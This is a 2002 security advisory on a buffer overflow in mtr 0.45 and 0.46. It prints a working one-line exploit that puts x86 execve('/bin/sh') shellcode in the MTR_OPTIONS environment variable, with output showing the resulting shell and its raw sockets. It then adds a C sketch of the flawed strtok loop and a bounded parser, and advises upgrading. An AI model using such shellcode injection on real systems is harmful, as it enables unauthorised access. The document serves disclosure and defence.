
mtr buffer overflow
7th Mar 2002 [SBWID-5168]
COMMAND

	mtr buffer overflow

SYSTEMS AFFECTED

	mtr 0.45, 0.46

PROBLEM

	Przemyslaw Frasunek [http://www.frasunek.com/] says:

	The sample exploit is TRIVIAL because of the strtok/while loop in the
	vulnerable code.

	clitoris:/home/venglin/mtr-0.45> uname -smr
	Linux 2.4.8-26mdk i686

	clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`

	clitoris:/home/venglin/mtr-0.45> ./mtr
	sh-2.05$

	At this point, the exec'd shell has a raw socket opened:

	clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw

	sh        17263 venglin    3u   raw                        605400 00000000:00FF->00000000:0000 st=07
	sh        17263 venglin    4u   raw                        605401 00000000:0001->00000000:0000 st=07

	sh-2.05$ ls -la /proc/self/fd/
	total 0
	dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
	dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
	lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 -> /dev/pts/6
	lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 -> /dev/pts/6
	lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 -> /dev/pts/6
	lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 -> socket:[605400]
	lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 -> socket:[605401]
	lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 -> /proc/17318/fd

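	The unbounded strtok/while pattern the advisory blames, shown as a hypothetical reconstruction beside a bounded parser of an MTR_OPTIONS-style variable. This is an added example, not mtr's source; MAX_OPTS, parse_env_options and the demo_* helpers are assumed names, and the "A A A ..." input is constructed to match the shape of the advisory's "A "x130 without the shellcode.

```c
#include <string.h>
#define MAX_OPTS 16   /* fixed number of option slots, as in a stack array */

/*
 * Vulnerable pattern (hypothetical reconstruction of the strtok/while loop
 * the advisory refers to; not mtr's actual source):
 *     char *opts[MAX_OPTS]; int n = 0;
 *     char *tok = strtok(getenv("MTR_OPTIONS"), " ");
 *     while (tok) { opts[n++] = tok; tok = strtok(NULL, " "); }
 * n is never compared with MAX_OPTS, so each extra whitespace-separated word
 * in the environment variable is one more pointer written past the array.
 */

/* Hardened form: bounded copy, bounded token count, explicit failure (-1). */
int parse_env_options(const char *env, char *buf, size_t buflen,
                      char **opts, size_t max_opts)
{
    size_t n = 0;
    if (env == NULL)
        return 0;                    /* variable not set: no options */
    if (strlen(env) >= buflen)
        return -1;                   /* refuse input the copy buffer can't hold */
    strcpy(buf, env);                /* safe: length checked just above */
    for (char *tok = strtok(buf, " "); tok != NULL; tok = strtok(NULL, " ")) {
        if (n >= max_opts)
            return -1;               /* too many tokens: reject, never overflow */
        opts[n++] = tok;
    }
    return (int)n;
}

/* Parses one constructed MTR_OPTIONS-style string; returns token count or -1. */
int demo_parse(const char *env)
{
    char buf[1024], *opts[MAX_OPTS];
    return parse_env_options(env, buf, sizeof buf, opts, MAX_OPTS);
}

/* Builds "A A A ..." with `words` words (the shape of the advisory's "A "x130,
 * minus the shellcode) and reports how the bounded parser treats it. */
int demo_flood(int words)
{
    char input[1024];
    int len = 0;
    for (int i = 0; i < words && len + 2 < (int)sizeof input; i++) {
        input[len++] = 'A'; input[len++] = ' ';
    }
    input[len] = '\0';
    return demo_parse(input);
}
```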

SOLUTION

	Upgrade to the latest patch level (as of 07 March 2002).
